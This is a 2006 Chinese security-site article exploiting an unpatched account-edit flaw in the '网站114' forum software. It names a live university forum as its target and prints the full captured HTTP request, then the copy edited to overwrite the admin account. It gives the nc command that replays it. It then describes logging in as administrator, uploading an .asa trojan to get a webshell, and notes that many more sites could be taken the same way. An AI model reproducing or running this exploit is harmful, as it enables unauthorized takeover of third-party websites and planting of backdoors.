您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

网站114论坛 2005正式版漏洞

2006-3-4 01:27| 投稿: security

摘要: 关键字:"版权所有 设计制作:网站114"漏洞描述: 网站114论坛 2005版正式/edituserdb.asp对提交数据和cooikes缺乏验证导致任意用户可以修改管理员密码默认后台admin/i...
关键字:"版权所有 设计制作:网站114"漏洞描述: 网站114论坛 2005版正式/edituserdb.asp对提交数据和cooikes缺乏验证导致任意用户可以修改管理员密码默认后台admin/index.asp今天在旁注一个机房的机器时用了一下。http://www.gxmu.net.cn/xzl/BBS/index.asp广西医科大学网站上的一个论坛。注册了一个用户33221.然后跳转到 /edituserdb.asp,单击“修改注册”开始抓包!用记事本保存抓包内容如下:-----------------------------------------------------------------------------------------------------------POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.aspAccept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)Host: www.gxmu.net.cnContent-Length: 2304Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtUserCode"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtPassword"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtConfirmPassword"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtQuestion"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtAnswer"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtUserName"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="selSex"先生-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtNick"11-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtProvince"111-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtAddress"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtPostCode"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtTel"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtMobile"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtFax"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtEmail"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtUrl"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtfile"; filename=""Content-Type: application/octet-stream-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtOicq"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtDocument"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="submit"修改注册信息-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtId"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtTempId"-----------------------------7d61e41d605f6--------------------------------------------------------------------------------------------------------------其中:“-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtUserCode"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtPassword"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtConfirmPassword"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtQuestion"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtAnswer"33221-----------------------------7d61e41d605f6”修改第一个"33221"为“admin”保存11.txt文本为:POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*Referer: http://www.gxmu.net.cn/xzl/BBS//edituserdb.aspAccept-Language: zh-cnContent-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)Host: www.gxmu.net.cnContent-Length: 2304Connection: Keep-AliveCache-Control: no-cacheCookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtUserCode"admin-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtPassword"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtConfirmPassword"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtQuestion"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtAnswer"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtUserName"33221-----------------------------7d61e41d605f6Content-Disposition: form-data; name="selSex"先生-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtNick"11-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtProvince"111-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtAddress"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtPostCode"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtTel"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtMobile"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtFax"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtEmail"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtUrl"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtfile"; filename=""Content-Type: application/octet-stream-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtOicq"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtDocument"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="submit"修改注册信息-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtId"-----------------------------7d61e41d605f6Content-Disposition: form-data; name="txtTempId"-----------------------------7d61e41d605f6--这里因为我注册的用户名33221与admin长度一至,所以这里不用修改字节长度。然后用nc提交到服务器nc     www.gxmu.net.cn   80 <11.txt返回提示修改会员资料成功。然后用admin 密码为申请33221的密码一至登录。当然就是管理员权限了,然后登录后台,点击“修改栏目”,上传asa木马,ok,拿到webshll。看了一下,这个论坛系统还没有出补丁,可以拿大批webshell了,不过我只要了对我比较有用的一个服务器,其它的没有去抓了。还有不清楚的,可以看下动画演示,http://www.ncph.net/soft/114论坛最新漏洞利用动画.rar垃圾漏洞,这里是弄给菜鸟看的,高人不要骂我。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部